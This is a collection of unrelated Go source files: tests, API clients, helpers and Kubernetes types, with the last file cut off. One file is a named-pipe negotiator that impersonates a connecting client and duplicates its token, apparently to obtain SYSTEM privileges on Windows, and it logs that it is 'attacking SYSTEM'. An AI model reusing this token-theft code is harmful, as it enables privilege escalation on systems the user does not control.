text stringlengths 11 4.05M |
|---|
package resourcemanager
import (
"coffeeMachine/src/entities"
"context"
"github.com/stretchr/testify/assert"
"sync"
"testing"
)
func TestNew(t *testing.T) {
tests := []struct {
name string
assert func(repository Repository)
}{
{
name: "success | get repository",
assert: func(repository Repository) {
assert.NotNil(t, repository)
assert.IsType(t, &repositoryImpl{}, repository)
concreteRepositoryImpl := repository.(*repositoryImpl)
assert.NotNil(t, concreteRepositoryImpl.availableResources)
assert.NotNil(t, concreteRepositoryImpl.mutex)
},
},
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
got := New()
tt.assert(got)
})
}
}
// Test_managerImpl_GetIngredient exercises repositoryImpl.GetIngredient
// for both the found and not-found paths.
func Test_managerImpl_GetIngredient(t *testing.T) {
	ctx := context.Background()
	type fields struct {
		mutex              map[string]*sync.RWMutex
		availableResources map[string]int
	}
	type args struct {
		ctx    context.Context
		getReq GetRequest
	}
	const (
		_IngredientID = "Ingredient1234"
	)
	tests := []struct {
		name   string
		fields fields
		args   args
		assert func(ingredient *entities.Ingredient, err error)
	}{
		{
			name: "success | new ingredient",
			args: args{
				ctx: ctx,
				getReq: GetRequest{
					IngredientID: _IngredientID,
				},
			},
			fields: fields{
				availableResources: map[string]int{
					_IngredientID: 5,
				},
				// Each case gets its own mutex map: the subtests run in
				// parallel, and a single map shared by every repository
				// instance is a data race if the implementation mutates it.
				mutex: map[string]*sync.RWMutex{},
			},
			assert: func(ingredient *entities.Ingredient, err error) {
				assert.NoError(t, err)
				assert.NotNil(t, ingredient)
				assert.Equal(t, _IngredientID, ingredient.ID)
			},
		},
		{
			name: "error | resource not found",
			args: args{
				ctx: ctx,
				getReq: GetRequest{
					IngredientID: _IngredientID,
				},
			},
			fields: fields{
				availableResources: map[string]int{},
				mutex:              map[string]*sync.RWMutex{},
			},
			assert: func(ingredient *entities.Ingredient, err error) {
				assert.EqualError(t, err, entities.ErrResourceNotAvailable.Error())
				assert.Nil(t, ingredient)
			},
		},
	}
	for _, testIdx := range tests {
		tt := testIdx // capture for the parallel closure (pre-Go 1.22 loop semantics)
		m := &repositoryImpl{
			mutex:              tt.fields.mutex,
			availableResources: tt.fields.availableResources,
		}
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()
			got, err := m.GetIngredient(tt.args.ctx, tt.args.getReq)
			tt.assert(got, err)
		})
	}
}
// Test_managerImpl_UpdateIngredient exercises repositoryImpl.UpdateIngredient
// for refill and consume actions, including the consume-to-zero cleanup path.
func Test_managerImpl_UpdateIngredient(t *testing.T) {
	ctx := context.Background()
	type fields struct {
		mutex              map[string]*sync.RWMutex
		availableResources map[string]int
	}
	type args struct {
		ctx       context.Context
		updateReq UpdateRequest
	}
	const (
		_IngredientID = "Ingredient1234"
	)
	// Each case gets its own mutex map. The original shared one map across
	// all parallel subtests, which is a data race and cross-contaminates
	// cases (the consume-to-zero case asserts a key was deleted from it).
	tests := []struct {
		name   string
		fields fields
		args   args
		assert func(repositoryImpl repositoryImpl, ingredient *entities.Ingredient, err error)
	}{
		{
			name: "success | update-action = refill, new ingredient",
			args: args{
				ctx: ctx,
				updateReq: UpdateRequest{
					IngredientID:     _IngredientID,
					UpdateType:       UpdateTypeRefill,
					ResourceQuantity: 5,
				},
			},
			fields: fields{
				mutex:              map[string]*sync.RWMutex{},
				availableResources: map[string]int{},
			},
			assert: func(repositoryImpl repositoryImpl, ingredient *entities.Ingredient, err error) {
				assert.NoError(t, err)
				assert.NotNil(t, ingredient)
				assert.Equal(t, 5, ingredient.Quantity)
			},
		},
		{
			name: "success | update-action = refill, ingredient already present with some quantity",
			args: args{
				ctx: ctx,
				updateReq: UpdateRequest{
					IngredientID:     _IngredientID,
					UpdateType:       UpdateTypeRefill,
					ResourceQuantity: 5,
				},
			},
			fields: fields{
				mutex: map[string]*sync.RWMutex{},
				availableResources: map[string]int{
					_IngredientID: 5,
				},
			},
			assert: func(repositoryImpl repositoryImpl, ingredient *entities.Ingredient, err error) {
				assert.NoError(t, err)
				assert.NotNil(t, ingredient)
				assert.Equal(t, 10, ingredient.Quantity)
			},
		},
		{
			name: "success | update-action = consume, ingredient not already present",
			args: args{
				ctx: ctx,
				updateReq: UpdateRequest{
					IngredientID:     _IngredientID,
					UpdateType:       UpdateTypeConsume,
					ResourceQuantity: 5,
				},
			},
			fields: fields{
				mutex:              map[string]*sync.RWMutex{},
				availableResources: map[string]int{},
			},
			assert: func(repositoryImpl repositoryImpl, ingredient *entities.Ingredient, err error) {
				assert.EqualError(t, err, entities.ErrResourceNotAvailable.Error())
			},
		},
		{
			name: "success | update-action = consume, ingredient already present with some quantity",
			args: args{
				ctx: ctx,
				updateReq: UpdateRequest{
					IngredientID:     _IngredientID,
					UpdateType:       UpdateTypeConsume,
					ResourceQuantity: 5,
				},
			},
			fields: fields{
				mutex: map[string]*sync.RWMutex{},
				availableResources: map[string]int{
					_IngredientID: 10,
				},
			},
			assert: func(repositoryImpl repositoryImpl, ingredient *entities.Ingredient, err error) {
				assert.NoError(t, err)
				assert.Equal(t, 5, ingredient.Quantity)
			},
		},
		{
			name: "success | update-action = consume, ingredient already present with same quantity, quantity becomes 0 after update",
			args: args{
				ctx: ctx,
				updateReq: UpdateRequest{
					IngredientID:     _IngredientID,
					UpdateType:       UpdateTypeConsume,
					ResourceQuantity: 5,
				},
			},
			fields: fields{
				mutex: map[string]*sync.RWMutex{},
				availableResources: map[string]int{
					_IngredientID: 5,
				},
			},
			assert: func(repositoryImpl repositoryImpl, ingredient *entities.Ingredient, err error) {
				assert.NoError(t, err)
				// fully-consumed ingredients must be evicted from both maps
				assert.NotContains(t, repositoryImpl.availableResources, _IngredientID)
				assert.NotContains(t, repositoryImpl.mutex, _IngredientID)
			},
		},
	}
	for _, testIdx := range tests {
		tt := testIdx // capture for the parallel closure (pre-Go 1.22 loop semantics)
		m := repositoryImpl{
			mutex:              tt.fields.mutex,
			availableResources: tt.fields.availableResources,
		}
		t.Run(tt.name, func(t *testing.T) {
			t.Parallel()
			got, err := m.UpdateIngredient(tt.args.ctx, tt.args.updateReq)
			tt.assert(m, got, err)
		})
	}
}
|
/*
Copyright 2020 The Skaffold Authors
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package manifest
import (
"fmt"
sErrors "github.com/GoogleContainerTools/skaffold/v2/pkg/skaffold/errors"
"github.com/GoogleContainerTools/skaffold/v2/proto/v1"
)
func replaceImageErr(err error) error {
return sErrors.NewError(err,
&proto.ActionableErr{
Message: fmt.Sprintf("replacing images in manifest: %s", err),
ErrCode: proto.StatusCode_RENDER_REPLACE_IMAGE_ERR,
})
}
func transformManifestErr(err error) error {
return sErrors.NewError(err,
&proto.ActionableErr{
Message: fmt.Sprintf("unable to transform manifests: %s", err),
ErrCode: proto.StatusCode_RENDER_TRANSFORM_MANIFEST_ERR,
})
}
func labelSettingErr(err error) error {
return sErrors.NewError(err,
&proto.ActionableErr{
Message: fmt.Sprintf("setting labels in manifests: %s", err),
ErrCode: proto.StatusCode_RENDER_SET_LABEL_ERR,
})
}
func parseImagesInManifestErr(err error) error {
if err == nil {
return err
}
return sErrors.NewError(err,
&proto.ActionableErr{
Message: fmt.Sprintf("parsing images in manifests: %s", err),
ErrCode: proto.StatusCode_RENDER_PARSE_MANIFEST_IMAGES_ERR,
})
}
func writeErr(err error) error {
return sErrors.NewError(err,
&proto.ActionableErr{
Message: err.Error(),
ErrCode: proto.StatusCode_RENDER_MANIFEST_WRITE_ERR,
})
}
func nsSettingErr(err error) error {
return sErrors.NewError(err,
&proto.ActionableErr{
Message: fmt.Sprintf("setting namespace in manifests: %s", err),
ErrCode: proto.StatusCode_RENDER_SET_NAMESPACE_ERR,
})
}
|
package odoo
import (
"fmt"
)
// FetchmailServer represents fetchmail.server model.
// FetchmailServer represents fetchmail.server model.
//
// NOTE(review): every tag option reads "omptempty" rather than the
// conventional "omitempty". The typo is consistent across this generated
// file, so it is preserved here — confirm what the xmlrpc encoder actually
// matches before "fixing" it, since changing the tags could start omitting
// empty fields on the wire.
type FetchmailServer struct {
	LastUpdate *Time `xmlrpc:"__last_update,omptempty"`
	ActionId *Many2One `xmlrpc:"action_id,omptempty"`
	Active *Bool `xmlrpc:"active,omptempty"`
	Attach *Bool `xmlrpc:"attach,omptempty"`
	Configuration *String `xmlrpc:"configuration,omptempty"`
	CreateDate *Time `xmlrpc:"create_date,omptempty"`
	CreateUid *Many2One `xmlrpc:"create_uid,omptempty"`
	Date *Time `xmlrpc:"date,omptempty"`
	DisplayName *String `xmlrpc:"display_name,omptempty"`
	Id *Int `xmlrpc:"id,omptempty"`
	IsSsl *Bool `xmlrpc:"is_ssl,omptempty"`
	MessageIds *Relation `xmlrpc:"message_ids,omptempty"`
	Name *String `xmlrpc:"name,omptempty"`
	ObjectId *Many2One `xmlrpc:"object_id,omptempty"`
	Original *Bool `xmlrpc:"original,omptempty"`
	Password *String `xmlrpc:"password,omptempty"`
	Port *Int `xmlrpc:"port,omptempty"`
	Priority *Int `xmlrpc:"priority,omptempty"`
	Script *String `xmlrpc:"script,omptempty"`
	Server *String `xmlrpc:"server,omptempty"`
	State *Selection `xmlrpc:"state,omptempty"`
	Type *Selection `xmlrpc:"type,omptempty"`
	User *String `xmlrpc:"user,omptempty"`
	WriteDate *Time `xmlrpc:"write_date,omptempty"`
	WriteUid *Many2One `xmlrpc:"write_uid,omptempty"`
}
// FetchmailServers represents array of fetchmail.server model.
type FetchmailServers []FetchmailServer

// FetchmailServerModel is the odoo model name.
const FetchmailServerModel = "fetchmail.server"
// Many2One convert FetchmailServer to *Many2One.
// NOTE(review): dereferences fs.Id — assumes this is only called on records
// loaded from the server (where Id is populated); confirm.
func (fs *FetchmailServer) Many2One() *Many2One {
	return NewMany2One(fs.Id.Get(), "")
}
// CreateFetchmailServer creates a new fetchmail.server model and returns its id.
// A -1 id with a nil error means the server returned no id.
func (c *Client) CreateFetchmailServer(fs *FetchmailServer) (int64, error) {
	ids, err := c.CreateFetchmailServers([]*FetchmailServer{fs})
	switch {
	case err != nil:
		return -1, err
	case len(ids) == 0:
		return -1, nil
	default:
		return ids[0], nil
	}
}
// CreateFetchmailServers creates new fetchmail.server models and returns their ids.
// (The original doc comment repeated the singular function's name.)
func (c *Client) CreateFetchmailServers(fss []*FetchmailServer) ([]int64, error) {
	// pre-size: the payload always has exactly one entry per input record
	vv := make([]interface{}, 0, len(fss))
	for _, v := range fss {
		vv = append(vv, v)
	}
	return c.Create(FetchmailServerModel, vv)
}
// UpdateFetchmailServer updates an existing fetchmail.server record,
// addressed by fs.Id.
func (c *Client) UpdateFetchmailServer(fs *FetchmailServer) error {
	return c.UpdateFetchmailServers([]int64{fs.Id.Get()}, fs)
}
// UpdateFetchmailServers updates existing fetchmail.server records.
// All records (represented by ids) will be updated by fs values.
func (c *Client) UpdateFetchmailServers(ids []int64, fs *FetchmailServer) error {
	return c.Update(FetchmailServerModel, ids, fs)
}
// DeleteFetchmailServer deletes an existing fetchmail.server record by id.
func (c *Client) DeleteFetchmailServer(id int64) error {
	return c.DeleteFetchmailServers([]int64{id})
}
// DeleteFetchmailServers deletes existing fetchmail.server records by ids.
func (c *Client) DeleteFetchmailServers(ids []int64) error {
	return c.Delete(FetchmailServerModel, ids)
}
// GetFetchmailServer gets an existing fetchmail.server record by id.
// It returns an error if the id does not exist.
func (c *Client) GetFetchmailServer(id int64) (*FetchmailServer, error) {
	fss, err := c.GetFetchmailServers([]int64{id})
	if err != nil {
		return nil, err
	}
	// GetFetchmailServers never returns a nil pointer on success, so only
	// emptiness needs checking (the original also nil-checked redundantly).
	if len(*fss) > 0 {
		return &((*fss)[0]), nil
	}
	return nil, fmt.Errorf("id %v of fetchmail.server not found", id)
}
// GetFetchmailServers gets existing fetchmail.server records by ids.
func (c *Client) GetFetchmailServers(ids []int64) (*FetchmailServers, error) {
	result := &FetchmailServers{}
	err := c.Read(FetchmailServerModel, ids, nil, result)
	if err != nil {
		return nil, err
	}
	return result, nil
}
// FindFetchmailServer finds the first fetchmail.server record matching criteria.
// It returns an error if no record matches.
func (c *Client) FindFetchmailServer(criteria *Criteria) (*FetchmailServer, error) {
	fss := &FetchmailServers{}
	if err := c.SearchRead(FetchmailServerModel, criteria, NewOptions().Limit(1), fss); err != nil {
		return nil, err
	}
	// fss is never nil here, so only emptiness needs checking
	// (the original also nil-checked redundantly).
	if len(*fss) > 0 {
		return &((*fss)[0]), nil
	}
	return nil, fmt.Errorf("fetchmail.server was not found with criteria %v", criteria)
}
// FindFetchmailServers finds fetchmail.server records by querying with
// criteria and filtering with options.
func (c *Client) FindFetchmailServers(criteria *Criteria, options *Options) (*FetchmailServers, error) {
	result := &FetchmailServers{}
	err := c.SearchRead(FetchmailServerModel, criteria, options, result)
	if err != nil {
		return nil, err
	}
	return result, nil
}
// FindFetchmailServerIds finds record ids by querying with criteria and
// filtering with options.
func (c *Client) FindFetchmailServerIds(criteria *Criteria, options *Options) ([]int64, error) {
	ids, err := c.Search(FetchmailServerModel, criteria, options)
	if err != nil {
		// return nil on error (idiomatic) rather than an allocated empty slice
		return nil, err
	}
	return ids, nil
}
// FindFetchmailServerId finds a single record id by querying with criteria
// and options; it returns an error when nothing matches.
func (c *Client) FindFetchmailServerId(criteria *Criteria, options *Options) (int64, error) {
	ids, err := c.Search(FetchmailServerModel, criteria, options)
	switch {
	case err != nil:
		return -1, err
	case len(ids) == 0:
		return -1, fmt.Errorf("fetchmail.server was not found with criteria %v and options %v", criteria, options)
	default:
		return ids[0], nil
	}
}
|
package sqs
import (
"fmt"
"strings"
"github.com/xidongc/qproxy/rpc"
)
const sepChar = "_"
const forwardSlash = "/"
// QueueIdToName maps a QueueId to its backing SQS queue name,
// "<namespace>_<name>".
func QueueIdToName(id *rpc.QueueId) *string {
	name := id.Namespace + sepChar + id.Name
	return &name
}
// QueueUrlToQueueId parses an SQS queue URL back into a QueueId. The final
// path segment is expected to be "<namespace>_<name>".
func QueueUrlToQueueId(url string) (*rpc.QueueId, error) {
	// Example url: https://sqs.us-east-2.amazonaws.com/123456789012/MyQueue
	tokens := strings.Split(url, forwardSlash)
	name := tokens[len(tokens)-1]
	// MixedCaps local (was snake_case name_tokens); SplitN(2) keeps any
	// further underscores inside the Name part.
	nameTokens := strings.SplitN(name, sepChar, 2)
	if len(nameTokens) != 2 {
		// error strings are lowercase per Go convention (staticcheck ST1005)
		return nil, fmt.Errorf("malformed queue name %v", name)
	}
	return &rpc.QueueId{
		Namespace: nameTokens[0],
		Name:      nameTokens[1],
	}, nil
}
|
package main
//Invalid
//Checks if length of expression list in LHS and RHS is equal
//
// NOTE: this function is deliberately malformed — it is a negative test
// case for the compiler/parser ("assignment mismatch: 2 variables but 3
// values"). Do not "fix" it.
func f() {
var a1, a2 int ;
a1, a2 = 3, 4, 5
}
package lc208
import (
"strings"
)
// Trie is a prefix tree over single-character strings (LeetCode 208).
type Trie struct {
	Value string            // character stored at this node ("*" for the root)
	Son   *map[string]*Trie // children keyed by character
	End   bool              // true when a complete inserted word ends here
}

/** Initialize your data structure here. */
func Constructor() Trie {
	return Trie{Value: "*", Son: &map[string]*Trie{}}
}

// Insert inserts a word into the trie.
func (this *Trie) Insert(word string) {
	node := this
	for _, ch := range strings.Split(word, "") {
		child := (*node.Son)[ch]
		if child == nil {
			child = &Trie{Value: ch, Son: &map[string]*Trie{}}
			(*node.Son)[ch] = child
		}
		node = child
	}
	// Mark the stored node itself. The original assigned `trie = *node`
	// (a copy) while walking existing nodes, so inserting a word whose
	// path already existed set End on the copy and was silently lost.
	node.End = true
}

// Search returns whether word was previously inserted as a complete word.
func (this *Trie) Search(word string) bool {
	node := this
	for _, ch := range strings.Split(word, "") {
		child := (*node.Son)[ch]
		if child == nil {
			return false
		}
		node = child
	}
	// The original evaluated wordArr[index] with index == len(wordArr),
	// panicking with an index-out-of-range on every full match; the End
	// flag of the node we stopped on is the correct answer.
	return node.End
}

// StartsWith returns whether any inserted word starts with the given prefix.
func (this *Trie) StartsWith(prefix string) bool {
	// The original delegated to Search, which wrongly rejected proper
	// prefixes of inserted words (a prefix match must not require End).
	node := this
	for _, ch := range strings.Split(prefix, "") {
		child := (*node.Son)[ch]
		if child == nil {
			return false
		}
		node = child
	}
	return true
}
/**
* Your Trie object will be instantiated and called as such:
* obj := Constructor();
* obj.Insert(word);
* param_2 := obj.Search(word);
* param_3 := obj.StartsWith(prefix);
*/
|
package main
import (
"fmt"
"syscall"
"unsafe"
"golang.org/x/sys/windows"
)
type NamedPipeNegotiator struct {
Name string
}
// Serve creates a named pipe at \\.\pipe\<negotiator.Name>, waits for a
// client to connect, impersonates that client, and duplicates the client's
// access token into a primary token returned in the NegotiatorResult.
//
// NOTE(review): the error paths after pipe creation (read failure,
// impersonation failure, token open/duplicate failure) return without
// closing pipeHandle — confirm whether this handle leak matters for the
// tool's process lifetime.
func (negotiator NamedPipeNegotiator) Serve() NegotiatorResult {
	var sd windows.SECURITY_DESCRIPTOR
	pipeName := "\\\\.\\pipe\\" + negotiator.Name
	// Build a security descriptor whose DACL allows anyone to open the
	// pipe; failure is tolerated (a SYSTEM client can usually still connect).
	_, _, err := initializeSecurityDescriptor.Call(uintptr(unsafe.Pointer(&sd)), 1)
	if err == syscall.Errno(0) {
		_, _, err = setSecurityDescriptorDacl.Call(uintptr(unsafe.Pointer(&sd)), 1, 0, 0)
		if err != syscall.Errno(0) {
			fmt.Println("[!] Couldn't allow everyone to read pipe - if you are attacking SYSTEM this is fine")
		} else {
			fmt.Println("[+] Set DACL to allow anyone to access")
		}
	}
	// Length 40 — presumably sizeof(SECURITY_ATTRIBUTES) on 64-bit
	// Windows; confirm this tool never targets 32-bit.
	sa := windows.SecurityAttributes{
		Length: 40,
		SecurityDescriptor: &sd,
		InheritHandle: 0,
	}
	pipeHandle, err := windows.CreateNamedPipe(windows.StringToUTF16Ptr(pipeName), windows.PIPE_ACCESS_DUPLEX, windows.PIPE_TYPE_BYTE|windows.PIPE_WAIT|windows.PIPE_REJECT_REMOTE_CLIENTS, 10, 2048, 2048, 0, &sa)
	if err != nil {
		fmt.Println("[!] Failed to create pipe "+pipeName+": ", windows.GetLastError())
		return NegotiatorResult{nil, err}
	}
	fmt.Println("[+] Created pipe at " + pipeName)
	// Block until a client connects.
	err = windows.ConnectNamedPipe(pipeHandle, nil)
	if err != nil {
		fmt.Println("[!] Failed to connect to pipe "+pipeName+": ", windows.GetLastError())
		windows.CloseHandle(pipeHandle)
		return NegotiatorResult{nil, err}
	}
	fmt.Println("[+] Connection established, duplicating client token")
	// Read one byte from the client before impersonating it.
	buf := []byte{0}
	_, err = windows.Read(pipeHandle, buf)
	if err != nil {
		fmt.Println("[!] Failed to read from pipe")
		return NegotiatorResult{nil, err}
	}
	// Adopt the client's security context on the current thread.
	_, _, err = impersonateNamedPipeClient.Call(uintptr(pipeHandle))
	if err != syscall.Errno(0) {
		fmt.Println("[!] Call to ImpersonateNamedPipeClient failed")
		return NegotiatorResult{nil, err}
	}
	threadHandle, err := windows.GetCurrentThread()
	if err != nil {
		fmt.Println("[!] Failed to get current thread")
		return NegotiatorResult{nil, err}
	}
	// Open the impersonation token now backing this thread.
	var threadToken windows.Token
	err = windows.OpenThreadToken(threadHandle, windows.TOKEN_ALL_ACCESS, false, &threadToken)
	if err != nil {
		fmt.Println("[!] Failed to open thread token")
		return NegotiatorResult{nil, err}
	}
	// Convert the impersonation token into a primary token.
	var systemToken windows.Token
	err = windows.DuplicateTokenEx(threadToken, windows.MAXIMUM_ALLOWED, nil, SecurityImpersonation, windows.TokenPrimary, &systemToken)
	if err != nil {
		fmt.Println("[!] Failed to duplicate client token")
		return NegotiatorResult{nil, err}
	}
	// Drop the impersonated context and release the pipe.
	windows.RevertToSelf()
	windows.CloseHandle(pipeHandle)
	return NegotiatorResult{&systemToken, nil}
}
// Trigger always reports true for the named-pipe negotiator — presumably
// the pipe approach needs no separate trigger step; confirm against the
// interface this satisfies.
func (negotiator NamedPipeNegotiator) Trigger() bool {
	return true
}
|
package pipelinetotaskrun
import (
"fmt"
"github.com/tektoncd/pipeline/pkg/apis/pipeline/v1alpha1"
"github.com/tektoncd/pipeline/pkg/apis/pipeline/v1beta1"
)
// getMergedTaskRun flattens a pipeline (a v1alpha1.Run plus its
// PipelineSpec and referenced TaskSpecs) into one TaskRun whose single
// TaskSpec contains every pipeline task's steps, params and results, in a
// dependency-respecting order.
func getMergedTaskRun(run *v1alpha1.Run, pSpec *v1beta1.PipelineSpec, taskSpecs map[string]*v1beta1.TaskSpec) (*v1beta1.TaskRun, error) {
	// order tasks so each task appears after everything it depends on
	sequence, err := putTasksInOrder(pSpec.Tasks)
	if err != nil {
		return nil, fmt.Errorf("couldn't find valid order for tasks: %v", err)
	}
	// we'll be declaring and mapping one workspace per provided workspace and eliminating the indirection added by the
	// workspaces declared by the Task. This will make sure that if volume claim templates are used, only one volume
	// will be created for each.
	newWorkspaceMapping := getNewWorkspaceMapping(sequence)
	// replace all param values with pipeline level params so we can ignore them from now on
	sequenceWithAppliedParams := applyPipelineLevelParams(sequence, run.Spec.Params)
	tr := &v1beta1.TaskRun{
		ObjectMeta: getObjectMeta(run),
		Spec: v1beta1.TaskRunSpec{
			ServiceAccountName: run.Spec.ServiceAccountName,
			TaskSpec: &v1beta1.TaskSpec{},
			Workspaces: run.Spec.Workspaces,
		},
	}
	// re-declare the pipeline-level workspaces on the merged TaskSpec
	for _, w := range pSpec.Workspaces {
		// mapping only the supported workspace declaration fields
		tr.Spec.TaskSpec.Workspaces = append(tr.Spec.TaskSpec.Workspaces, v1beta1.WorkspaceDeclaration{
			Name: w.Name,
			Description: w.Description,
		})
	}
	// if an optional workspace isn't provided, we don't need to remap it but we still need to declare it
	// in order for any variable interpolation to work
	optionalWS, err := getUnboundOptionalWorkspaces(taskSpecs, newWorkspaceMapping)
	if err != nil {
		return nil, fmt.Errorf("invalid workspace binding for %s wasn't caught by validation: %v", run.Name, err)
	}
	for _, ws := range optionalWS {
		tr.Spec.TaskSpec.Workspaces = append(tr.Spec.TaskSpec.Workspaces, v1beta1.WorkspaceDeclaration{
			Name: ws.Name,
			Description: ws.Description,
			Optional: ws.Optional,
		})
	}
	// merge each task's params, steps and results, namespacing names so
	// tasks don't collide inside the single TaskSpec
	for _, pTask := range sequenceWithAppliedParams {
		pti, err := NewPipelineTaskInfo(pTask, taskSpecs)
		if err != nil {
			return nil, fmt.Errorf("couldn't construct object to hold pipeline task info for %s: %v", pTask.Name, err)
		}
		pti = pti.NamespaceParams()
		pti = pti.NamespaceSteps()
		pti = pti.RenameWorkspaces(newWorkspaceMapping[pTask.Name])
		tr.Spec.Params = append(tr.Spec.Params, pti.ProvidedParamValues...)
		tr.Spec.TaskSpec.Params = append(tr.Spec.TaskSpec.Params, pti.TaskDeclaredParams...)
		tr.Spec.TaskSpec.Steps = append(tr.Spec.TaskSpec.Steps, pti.Steps...)
		// we don't support mapping results but we need to declare them in order for steps that write
		// results to be able to write to the dirs they expect
		tr.Spec.TaskSpec.Results = append(tr.Spec.TaskSpec.Results, pti.Results...)
	}
	return tr, nil
}
|
package config
import (
"bufio"
"os"
)
// ReadLineFile reads fileName and returns its lines, in order, without
// line terminators. It panics if the file cannot be opened or read
// (keeping the package's existing panic-on-error style).
func ReadLineFile(fileName string) []string {
	file, err := os.Open(fileName)
	if err != nil {
		panic(err)
	}
	// the original leaked the file handle — it was never closed
	defer file.Close()

	res := make([]string, 0)
	scanner := bufio.NewScanner(file)
	for scanner.Scan() {
		res = append(res, scanner.Text())
	}
	// the original ignored scanner.Err(), so a read error silently
	// truncated the result
	if err := scanner.Err(); err != nil {
		panic(err)
	}
	return res
}
|
package network
import (
"github.com/johnnyeven/terra/dht"
"reflect"
)
// PeerManager tracks known peers, keyed by their GUID bytes, on top of
// dht.SyncedMap (which provides the concurrency safety).
type PeerManager struct {
	peers *dht.SyncedMap
}

// NewPeerManager returns an empty, ready-to-use PeerManager.
func NewPeerManager() *PeerManager {
	return &PeerManager{
		peers: dht.NewSyncedMap(),
	}
}
// Get returns the peer stored under peerID. The boolean reports whether
// the peer exists; when it is false the returned peer is nil.
func (pm *PeerManager) Get(peerID []byte) (*Peer, bool) {
	val, ok := pm.peers.Get(string(peerID))
	if !ok {
		// the original asserted val.(*Peer) unconditionally, which
		// panics on a miss because val is a nil interface
		return nil, false
	}
	peer, ok := val.(*Peer)
	return peer, ok
}
// Has reports whether a peer is stored under peerID.
func (pm *PeerManager) Has(peerID []byte) bool {
	return pm.peers.Has(string(peerID))
}
// Set stores val keyed by its Guid.
// NOTE(review): a nil val would panic on val.Guid — confirm callers
// never pass nil.
func (pm *PeerManager) Set(val *Peer) {
	pm.peers.Set(string(val.Guid), val)
}
// Delete removes the peer stored under peerID, if any.
func (pm *PeerManager) Delete(peerID []byte) {
	pm.peers.Delete(string(peerID))
}
// DeleteMulti removes every peer whose ID appears in peerIDs.
// NOTE(review): the reflect.ValueOf(...).Interface() round-trip is a
// no-op — appending string(peerID) directly is equivalent. It is kept
// because this is the file's only use of the reflect import; removing it
// here would orphan that import.
func (pm *PeerManager) DeleteMulti(peerIDs [][]byte) {
	interfaces := make([]interface{}, 0)
	for _, peerID := range peerIDs {
		v := reflect.ValueOf(string(peerID))
		interfaces = append(interfaces, v.Interface())
	}
	pm.peers.DeleteMulti(interfaces)
}
// Clear removes all stored peers.
func (pm *PeerManager) Clear() {
	pm.peers.Clear()
}
// Iterator invokes iterator for every stored peer. If iterator returns an
// error, iteration continues when errorContinue is true and stops otherwise.
func (pm *PeerManager) Iterator(iterator func(peer *Peer) error, errorContinue bool) {
	for item := range pm.peers.Iter() {
		if err := iterator(item.Value.(*Peer)); err != nil && !errorContinue {
			break
		}
	}
}
// Len returns the number of stored peers.
func (pm *PeerManager) Len() int {
	return pm.peers.Len()
}
|
/*
Copyright 2021-2023 ICS-FORTH.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package v1alpha1
import (
"fmt"
"sort"
"strings"
"time"
v1 "k8s.io/api/core/v1"
"k8s.io/apimachinery/pkg/api/meta"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/util/json"
)
// +kubebuilder:object:root=true
// +kubebuilder:subresource:status
// Scenario is the Schema for the Scenarios API.
// +k8s:deepcopy-gen:interfaces=k8s.io/apimachinery/pkg/runtime.Object
type Scenario struct {
	metav1.TypeMeta `json:",inline"`
	metav1.ObjectMeta `json:"metadata,omitempty"`
	// Spec defines the desired state of the Scenario.
	Spec ScenarioSpec `json:"spec,omitempty"`
	// Status reflects the most recently observed state of the Scenario.
	Status ScenarioStatus `json:"status,omitempty"`
}
// Table returns a tabular form of the Scenario for pretty printing:
// namespace ("Test"), name, age, scheduled-actions summary, phase, and
// duration (time-to-completion, or age while still running).
func (in *Scenario) Table() (header []string, data [][]string) {
	header = []string{
		"Test",
		"Scenario",
		"Age",
		"Actions",
		"Phase",
		"Duration",
	}

	// scheduled/total actions, annotated when the scenario is suspended
	scheduled := fmt.Sprintf("%d/%d", len(in.Status.ScheduledJobs), len(in.Spec.Actions))
	if in.Spec.Suspend != nil && *in.Spec.Suspend {
		scheduled += " (Suspended)"
	}

	// age is the elapsed time since the test was created
	age := time.Since(in.GetCreationTimestamp().Time)
	if age < 0 {
		scenariolog.Info("Time skew between Kubernetes Server and Controller.")
	}

	// duration is the elapsed time until the test was completed (either
	// succeeded or failed); if not yet completed it equals the age.
	// The original repeated the same lookup for each terminal condition;
	// iterate instead, with later entries winning to preserve the
	// original precedence (completed < unexpected-termination < assertion).
	duration := age
	for _, conditionType := range []string{
		ConditionAllJobsAreCompleted.String(),
		ConditionJobUnexpectedTermination.String(),
		ConditionAssertionError.String(),
	} {
		if meta.IsStatusConditionTrue(in.Status.Conditions, conditionType) {
			cond := meta.FindStatusCondition(in.Status.Conditions, conditionType)
			duration = cond.LastTransitionTime.Sub(in.GetCreationTimestamp().Time)
		}
	}

	data = append(data, []string{
		in.GetNamespace(),
		in.GetName(),
		age.Round(time.Second).String(),
		scheduled,
		in.Status.Phase.String(),
		duration.Round(time.Second).String(),
	})
	return header, data
}
// ActionType names the category of a scenario action; each category maps
// to a specific controller (see the Enum marker on Action.ActionType).
type ActionType string

const (
	// ActionService creates a new service.
	ActionService ActionType = "Service"
	// ActionCluster creates multiple services running in a shared context.
	ActionCluster ActionType = "Cluster"
	// ActionChaos injects failures into the running system.
	ActionChaos ActionType = "Chaos"
	// ActionCascade injects multiple failures into the running system.
	ActionCascade ActionType = "Cascade"
	// ActionDelete deletes a created Frisbee resource (i.e services, clusters,).
	ActionDelete ActionType = "Delete"
	// ActionCall starts a remote process execution, from the controller to the targeted services.
	ActionCall ActionType = "Call"
)
// Action is a step in a workflow that defines a particular part of a testing process.
type Action struct {
	// ActionType refers to a category of actions that can be associated with a specific controller.
	// +kubebuilder:validation:Enum=Service;Cluster;Chaos;Cascade;Delete;Call
	ActionType ActionType `json:"action"`
	// Name is a unique identifier of the action
	Name string `json:"name"`
	// DependsOn defines the conditions for the execution of this action
	// +optional
